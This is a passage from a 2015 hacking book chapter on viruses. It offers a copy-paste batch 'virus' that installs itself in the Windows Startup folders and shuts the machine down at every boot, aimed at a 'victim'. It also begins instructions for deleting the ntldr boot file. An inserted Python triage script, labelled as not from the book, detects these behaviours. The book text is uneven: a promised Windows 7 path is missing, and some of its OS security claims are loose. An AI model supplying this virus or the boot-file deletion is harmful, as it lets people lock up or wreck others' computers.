Hacking: Become The Ultimate Hacker - Computer Virus, Cracking, Malware, IT Security (2015)
Chapter 3: Computer Virus: Most Common Malware
In computing, a virus is a small program, or sometimes a mere piece of code, that inserts itself into other important files such as system files and boot files. Viruses replicate themselves and mostly stay hidden. A file or folder is said to be infected if it is affected by a virus. Viruses are often harmful and rarely harmless. Harmful viruses perform activities such as accessing sensitive information, stealing data, consuming system resources such as CPU time and hard disk space, crippling the system, and sometimes rendering it useless.
Vulnerability of different operating systems to viruses
Systems that run Microsoft Windows are the most vulnerable to most viruses. This is because of the wide usage of Windows desktops among the world's users. The destructiveness of viruses or malware can be limited if diversified software is used on the systems of a network. Operating systems like Linux are open source, and their users can choose among different packaging tools and desktop environments; so if malware attacks systems running Linux, only a subset of the user group is affected. On Windows, however, users run the same set of applications, which results in the rapid spread of viruses among systems running Windows. These viruses target the same applications that run on all the hosts. The Mac operating system has not been attacked by any dangerous viruses in recent years. Windows is more vulnerable to viruses, and this fact is an important selling point for the Mac operating system.
You should be able to create viruses as a part of ethical hacking for vulnerability testing. Before trying out the code to create a batch virus, you need a clear understanding of batch files and their basics. You should also learn how to approach the code, so that you can create viruses on your own. After that, all you need to do is use Notepad to write or paste the code and give the file a .bat extension when saving it.
What are Batch Files?
Let’s begin with a simple example. Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one:
1. md x (makes directory 'x' on the desktop)
2. cd x (changes the current directory to 'x')
3. md y (makes a directory 'y' in directory 'x')
Here we created a directory called ‘x’, and in it, we have created another directory called ‘y’.
Delete the folder ‘x’
What can batch viruses do?
They are used for many purposes. Some of them include formatting data, deleting Windows files, annoying the victim, disabling the firewall, opening ports, consuming CPU resources etc.
Here is sample code for a batch virus. You just need to copy the code given below into Notepad and save it with the extension '.bat'. The name of the file is up to you. The virus that we are creating here is a simple one and it does no harm to your system. However, it will shut your computer down as soon as it starts.
REM these two commands copy the batch file into the start-up folders (in XP)
copy anything.bat "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup"
copy anything.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
REM this shuts down the computer in 0 seconds
shutdown -s -t 00
Note: The above virus is a simple 'shutdown' virus. To remove it, you will need to log in through safe mode and delete the file from the start-up folder where it was copied. The above path only works for Windows XP. If you wish to run it in Windows 7, you should use the following path.
Now every time the victim starts his computer, the batch file that we've created will be executed and will shut the system down immediately (the time given is 0 seconds).
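A defensive counterpart to the sample above, added here as an example and not taken from the book: a small Python triage function that flags batch scripts which copy a file into a Startup folder and call shutdown. The function names, the patterns and the three sample scripts are assumptions constructed for illustration.

```python
import re

# Heuristics for the two behaviours of the sample script above (assumed names).
# STARTUP_RE matches the "Start Menu\Programs\Startup" suffix of the XP paths.
STARTUP_RE = re.compile(r"start menu\\programs\\startup", re.IGNORECASE)
COPY_RE = re.compile(r"^\s*@?\s*(copy|xcopy|move)\b", re.IGNORECASE)
# shutdown with a power-off or restart switch: -s, /s, -r or /r
SHUTDOWN_RE = re.compile(r"^\s*@?\s*shutdown(\.exe)?\b.*?[-/][sr]\b", re.IGNORECASE)
COMMENT_RE = re.compile(r"^\s*@?\s*(rem\b|::)", re.IGNORECASE)


def triage_batch(text):
    """Return (line_number, finding) pairs for one batch script's text."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or COMMENT_RE.match(line):
            continue  # blank lines and REM / :: comments execute nothing
        if COPY_RE.match(line) and STARTUP_RE.search(line):
            findings.append((number, "startup-persistence"))
        if SHUTDOWN_RE.match(line):
            findings.append((number, "forced-shutdown"))
    return findings


def verdict(text):
    """'suspicious' needs both behaviours; one alone is only worth a look."""
    kinds = {kind for _, kind in triage_batch(text)}
    if kinds == {"startup-persistence", "forced-shutdown"}:
        return "suspicious"
    return "review" if kinds else "clean"


# Constructed sample inputs (not collected from real systems).
SHUTDOWN_SAMPLE = r"""copy anything.bat "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup"
copy anything.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
shutdown -s -t 00
"""
BACKUP_SAMPLE = r"""@echo off
rem copy to Start Menu\Programs\Startup is only mentioned in this comment
xcopy C:\Data D:\Backup /E /Y
"""
REBOOT_SAMPLE = "shutdown /r /t 60\n"  # e.g. an administrator's patch-night reboot

if __name__ == "__main__":
    for name, sample in (("shutdown", SHUTDOWN_SAMPLE),
                         ("backup", BACKUP_SAMPLE),
                         ("reboot", REBOOT_SAMPLE)):
        print(name, verdict(sample), triage_batch(sample))
```

A script that only reboots, or only installs itself at start-up, is reported as "review" rather than "suspicious", since each behaviour on its own is common in legitimate administration scripts.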
Deleting boot files
Follow these steps for deleting the boot files.
· Follow the path C: Tools -> Folder Option -> View (for Windows XP)
· Uncheck the option 'Hide operating system files' and
· Check the option 'Show hidden files and folders'.
· Click apply
With this, you'll be able to see the operating system files. There you should see a boot loader file 'ntldr'.